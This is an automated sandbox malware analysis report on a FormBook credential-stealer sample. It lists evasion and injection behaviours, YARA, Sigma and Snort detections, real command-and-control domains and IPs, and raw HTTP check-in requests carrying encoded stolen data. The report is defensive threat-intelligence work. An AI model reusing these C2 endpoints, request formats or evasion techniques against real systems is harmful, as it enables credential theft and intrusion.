Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
F2024-202202.exe

Overview

General Information

Sample name:F2024-202202.exe
Analysis ID:1448090
MD5:0e7042c3256ba6a60bee8cf70a18958c
SHA1:06cd123e5cf1784d0b29415ebf6f58d4d4b21847
SHA256:85c1c78badee38d490bb6cb18e5f2fd19dbe97355af3d6823ac3b1c93f63f751
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • F2024-202202.exe (PID: 2108 cmdline: "C:\Users\user\Desktop\F2024-202202.exe" MD5: 0E7042C3256BA6A60BEE8CF70A18958C)
    • svchost.exe (PID: 5812 cmdline: "C:\Users\user\Desktop\F2024-202202.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • HCyQCFLUGWqlxNRVXC.exe (PID: 768 cmdline: "C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • openfiles.exe (PID: 5700 cmdline: "C:\Windows\SysWOW64\openfiles.exe" MD5: 50BD10A4C573E609A401114488299D3D)
          • HCyQCFLUGWqlxNRVXC.exe (PID: 7132 cmdline: "C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5004 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bed0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1577f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x8db30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x773df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e653:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17f02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f453:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x18d02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\F2024-202202.exe", CommandLine: "C:\Users\user\Desktop\F2024-202202.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\F2024-202202.exe", ParentImage: C:\Users\user\Desktop\F2024-202202.exe, ParentProcessId: 2108, ParentProcessName: F2024-202202.exe, ProcessCommandLine: "C:\Users\user\Desktop\F2024-202202.exe", ProcessId: 5812, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\F2024-202202.exe", CommandLine: "C:\Users\user\Desktop\F2024-202202.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\F2024-202202.exe", ParentImage: C:\Users\user\Desktop\F2024-202202.exe, ParentProcessId: 2108, ParentProcessName: F2024-202202.exe, ProcessCommandLine: "C:\Users\user\Desktop\F2024-202202.exe", ProcessId: 5812, ProcessName: svchost.exe

            Snort Signatures

            Timestamp:05/27/24-19:16:10.032522
            SID:2855464
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-19:16:59.270961
            SID:2855464
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-19:16:26.567429
            SID:2855464
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-19:17:01.817147
            SID:2855464
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-19:15:43.469777
            SID:2855465
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-19:16:24.039251
            SID:2855464
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-19:16:17.928509
            SID:2855465
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-19:16:12.566468
            SID:2855464
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-19:16:32.483493
            SID:2855465
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: F2024-202202.exeJoe Sandbox ML: detected
            Source: F2024-202202.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: OpnFiles.pdb source: svchost.exe, 00000002.00000003.2309893879.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2309986096.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2562919899.0000000000F29000.00000004.00000001.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2279464547.0000000000F1B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HCyQCFLUGWqlxNRVXC.exe, 00000004.00000000.2264662254.000000000010E000.00000002.00000001.01000000.00000005.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410177309.000000000010E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: F2024-202202.exe, 00000000.00000003.2014375055.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, F2024-202202.exe, 00000000.00000003.2014549447.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2248825396.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250328113.0000000003200000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254305828.000000000461E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2345302031.0000000004115000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254305828.0000000004480000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2347471193.00000000042CC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: F2024-202202.exe, 00000000.00000003.2014375055.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, F2024-202202.exe, 00000000.00000003.2014549447.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2248825396.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250328113.0000000003200000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000005.00000002.3254305828.000000000461E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2345302031.0000000004115000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254305828.0000000004480000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2347471193.00000000042CC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: OpnFiles.pdbGCTL source: svchost.exe, 00000002.00000003.2309893879.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2309986096.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2562919899.0000000000F29000.00000004.00000001.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2279464547.0000000000F1B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: openfiles.exe, 00000005.00000002.3253131424.000000000275A000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254850708.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410616230.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2680745913.0000000003A5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: openfiles.exe, 00000005.00000002.3253131424.000000000275A000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254850708.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410616230.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2680745913.0000000003A5C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001E4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_001E4696
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001EC93C FindFirstFileW,FindClose,0_2_001EC93C
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_001EC9C7
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001EF200
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001EF35D
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_001EF65E
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001E3A2B
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001E3D4E
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_001EBF27
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0014D4E0 FindFirstFileW,FindNextFileW,FindClose,5_2_0014D4E0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 4x nop then xor eax, eax5_2_0013AE80
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 4x nop then pop edi5_2_0013F874

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49711 -> 66.113.136.229:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49713 -> 194.58.112.174:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49714 -> 194.58.112.174:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49716 -> 194.58.112.174:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49717 -> 43.132.225.97:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49718 -> 43.132.225.97:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49720 -> 43.132.225.97:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49721 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49722 -> 188.114.96.3:80
            Source: Joe Sandbox ViewIP Address: 43.132.225.97 43.132.225.97
            Source: Joe Sandbox ViewIP Address: 194.58.112.174 194.58.112.174
            Source: Joe Sandbox ViewIP Address: 66.113.136.229 66.113.136.229
            Source: Joe Sandbox ViewASN Name: LILLY-ASUS LILLY-ASUS
            Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
            Source: Joe Sandbox ViewASN Name: AFFINITY-FTLUS AFFINITY-FTLUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001F25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_001F25E2
            Source: global trafficHTTP traffic detected: GET /0so0/?X430XLq0=CY1s0XH7bNWttwV9rZ4SbfagXQ6dqpRCQvxAN47rZ58SWMnAte1QXQdn29aNO6h1oK8GMPzGoaIoZ8sBEayCkb2ait1G89/ayPLVJ4jhwFoJQSPoL8Uww1rncwUMKC4qFA==&Wd=vjk8lhT0U4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.goodroothealth.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0so0/?Wd=vjk8lhT0U4&X430XLq0=SUPNUPL8X55ZGDaBFxP5SDbwzWvdce9LIUPHC0QIzt1ZKzL94hFLYJx7/4VaKoGV20qcYSFkx0JiG8qMm/Id/bOZDN/8qZd0HZpra/ntz1I1MPsqBdN1VMBNg4zQsHhwAw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.make-l.ruConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0so0/?X430XLq0=ZXsyqv6OWO1jdfmZwPHK8dAntN05Z+dsmugw9BJBTbqyaa2WOVN+U2naZpjsCmE4tUAeXtTgCCsmM8Dup6ejRXHoa4TAR4CFgRPYrdUpMYgqMRztZg/3Zk7YYa9ZW1B17w==&Wd=vjk8lhT0U4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kguyreoalpha.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.sweet777.work
            Source: global trafficDNS traffic detected: DNS query: www.goodroothealth.com
            Source: global trafficDNS traffic detected: DNS query: www.make-l.ru
            Source: global trafficDNS traffic detected: DNS query: www.kguyreoalpha.shop
            Source: global trafficDNS traffic detected: DNS query: www.waldil.online
            Source: unknownHTTP traffic detected: POST /0so0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.make-l.ruCache-Control: no-cacheContent-Length: 209Content-Type: application/x-www-form-urlencodedConnection: closeOrigin: http://www.make-l.ruReferer: http://www.make-l.ru/0so0/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 58 34 33 30 58 4c 71 30 3d 66 57 6e 74 58 34 37 33 48 61 64 4b 4e 48 50 57 50 51 2f 54 55 52 4f 36 79 6d 6e 59 65 35 35 4b 4e 6b 48 58 62 56 51 34 36 62 70 35 44 41 47 75 6d 69 73 67 58 36 39 64 6a 4a 6b 59 41 35 69 49 39 6b 33 6a 55 68 49 79 2f 41 55 63 48 5a 53 50 31 65 73 51 38 4c 4f 6a 58 66 57 59 68 34 74 6c 48 62 78 4a 47 35 50 6a 31 6a 30 6a 4d 65 59 7a 50 4f 42 73 54 34 59 47 71 70 6a 2b 7a 33 6b 5a 46 6f 6b 56 53 71 6f 73 51 65 4e 61 47 59 57 50 61 52 50 4a 34 44 75 69 4a 4a 6b 44 65 6c 47 32 30 48 67 4a 54 59 39 68 59 4c 64 77 76 32 4f 32 78 2f 64 77 63 61 50 56 32 47 41 70 56 32 4b 54 55 6d 53 6d 66 65 59 3d Data Ascii: X430XLq0=fWntX473HadKNHPWPQ/TURO6ymnYe55KNkHXbVQ46bp5DAGumisgX69djJkYA5iI9k3jUhIy/AUcHZSP1esQ8LOjXfWYh4tlHbxJG5Pj1j0jMeYzPOBsT4YGqpj+z3kZFokVSqosQeNaGYWPaRPJ4DuiJJkDelG20HgJTY9hYLdwv2O2x/dwcaPV2GApV2KTUmSmfeY=
            Source: openfiles.exe, 00000005.00000002.3254850708.00000000051B8000.00000004.10000000.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000002.3254422151.0000000002D98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://make-l.ru/0so0/?Wd=vjk8lhT0U4&X430XLq0=SUPNUPL8X55ZGDaBFxP5SDbwzWvdce9LIUPHC0QIzt1ZKzL94hFLYJ
            Source: HCyQCFLUGWqlxNRVXC.exe, 00000006.00000002.3255683162.0000000004B21000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kguyreoalpha.shop
            Source: HCyQCFLUGWqlxNRVXC.exe, 00000006.00000002.3255683162.0000000004B21000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kguyreoalpha.shop/0so0/
            Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: openfiles.exe, 00000005.00000003.2574125163.000000000279C000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3253131424.0000000002776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: openfiles.exe, 00000005.00000003.2574125163.000000000279C000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3253131424.0000000002796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: openfiles.exe, 00000005.00000002.3253131424.0000000002776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: openfiles.exe, 00000005.00000003.2574125163.000000000279C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: openfiles.exe, 00000005.00000002.3253131424.0000000002776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: openfiles.exe, 00000005.00000003.2574125163.000000000279C000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3253131424.0000000002776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: openfiles.exe, 00000005.00000003.2574125163.000000000279C000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3253131424.0000000002796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: openfiles.exe, 00000005.00000003.2573492642.00000000073D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_001F425A
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001F4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_001F4458
